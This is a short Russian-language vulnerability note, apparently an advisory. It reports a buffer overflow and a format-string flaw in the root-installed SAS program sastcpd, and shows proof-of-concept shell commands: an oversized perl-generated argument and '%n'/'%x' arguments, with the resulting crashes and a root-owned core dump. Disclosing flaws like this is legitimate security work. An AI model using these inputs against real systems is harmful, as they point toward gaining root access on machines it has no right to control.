Программы SAS предназначены для обработки
данных, их анализ, вывода отчетов. В sastcpd
существует буфер, который можно
переполнить, плюс программа неправильно
обрабатывает аргументы, а так как прога по
умолчанию устанавливается от rооt'а - можно
получить полный доступ к системе.
$ sastcpd `perl -e "print 'A' x 1200"`
Invalid argument: AAAA[..cut..]AAAA.
Segmentation fault (core dumped)
$ ls -la core
-rw------- 1 root teknix 1454382 Jan 28 04:22 core
$ sastcpd %n
Segmentation fault (core dumped)
$ sastcpd %x
Invalid argument: 2.
